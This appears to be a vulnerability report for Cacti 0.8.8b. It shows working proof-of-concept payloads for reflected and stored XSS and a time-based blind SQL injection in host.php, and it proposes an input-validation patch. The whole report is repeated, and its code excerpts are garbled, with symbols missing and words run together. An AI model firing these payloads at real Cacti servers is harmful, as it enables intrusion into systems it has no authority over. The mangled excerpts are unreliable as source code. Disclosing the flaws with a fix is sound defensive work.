The following are XSS and SQL Injection vulnerabilities I've found in the latest version of Cacti (0.8.8b), but are also in lower versions.
[ Reflected XSS ]
There is a reflected Cross Site Scripting vulnerability in the "step" parameter of the "/install/index.php" script.
http://<IP>/cacti/install/index.php?x=52&y=21&step="><script>alert(12345)</script> [ ^]
[ Stored XSS ]
The "/cacti/host.php" script is vulnerable to a stored Cross Site Scripting vulnerability in the "id" parameter.
Send the following POST request.
POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
id=<script>alert(12345)</script>&save_component_host=1&action=save
Now browse to http://<IP>/cacti/utilities.php?tail_lines=500&message_type=-1&go=Go&refresh=60&reverse=1&filter=12345&page=1&action=view_logfile [ ^] and you'll see a popup with the text "12345".
[ Blind SQL Injection ]
The "/cacti/host.php" script is vulnerable to Blind SQL Injection in the "id" parameter. The proof of concept below will send a query to the backend MySQL which will calculate the MD5 hash for "1" 1000000 times and thus cause a delay before finishing the query.
POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
id=-1 AND BENCHMARK(1000000,MD5(1))&save_component_host=1&action=save
The SQLi vulnerability is in the host.php which doesn't sanitize the idparameterwhenprovidingittotheapidevicesave()functioninlib/apidevice.phphost.php:152:host_id = api_device_save(POST["id"],_POST["host_template_id"], POST["description"],lib/apidevice.php:94:functionapidevicesave(id, hosttemplateid,description, hostname,snmp_community, snmpversion,[..SNIP..]103:/∗fetchsomecachevariables∗/104:if(empty(id)) {
105: _host_template_id = 0;
106: }else{
107: $_host_template_id = db_fetch_cell("select host_template_id from host where id=$id");
108: }
The changes below in "host.php" will fix this:
148: if ((isset(_POST["save_component_host"])) && (empty(_POST["add_dq_x"]))) {
149:+ /* ================= input validation ================= */
150:+ input_validate_input_number(get_request_var_post("id"));
151:+ /* ==================================================== */
152: if (_POST["snmp_version"] == 3 && (POST["snmppassword"]!=_POST["snmp_password_confirm"])) {
[ Reflected XSS ]
There is a reflected Cross Site Scripting vulnerability in the "step" parameter of the "/install/index.php" script.
http://<IP>/cacti/install/index.php?x=52&y=21&step="><script>alert(12345)</script> [ ^]
[ Stored XSS ]
The "/cacti/host.php" script is vulnerable to a stored Cross Site Scripting vulnerability in the "id" parameter.
Send the following POST request.
POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
id=<script>alert(12345)</script>&save_component_host=1&action=save
Now browse to http://<IP>/cacti/utilities.php?tail_lines=500&message_type=-1&go=Go&refresh=60&reverse=1&filter=12345&page=1&action=view_logfile [ ^] and you'll see a popup with the text "12345".
[ Blind SQL Injection ]
The "/cacti/host.php" script is vulnerable to Blind SQL Injection in the "id" parameter. The proof of concept below will send a query to the backend MySQL which will calculate the MD5 hash for "1" 1000000 times and thus cause a delay before finishing the query.
POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
id=-1 AND BENCHMARK(1000000,MD5(1))&save_component_host=1&action=save
The SQLi vulnerability is in the host.php which doesn't sanitize the idparameterwhenprovidingittotheapidevicesave()functioninlib/apidevice.phphost.php:152:host_id = api_device_save(POST["id"],_POST["host_template_id"], POST["description"],lib/apidevice.php:94:functionapidevicesave(id, hosttemplateid,description, hostname,snmp_community, snmpversion,[..SNIP..]103:/∗fetchsomecachevariables∗/104:if(empty(id)) {
105: _host_template_id = 0;
106: }else{
107: $_host_template_id = db_fetch_cell("select host_template_id from host where id=$id");
108: }
The changes below in "host.php" will fix this:
148: if ((isset(_POST["save_component_host"])) && (empty(_POST["add_dq_x"]))) {
149:+ /* ================= input validation ================= */
150:+ input_validate_input_number(get_request_var_post("id"));
151:+ /* ==================================================== */
152: if (_POST["snmp_version"] == 3 && (POST["snmppassword"]!=_POST["snmp_password_confirm"])) {
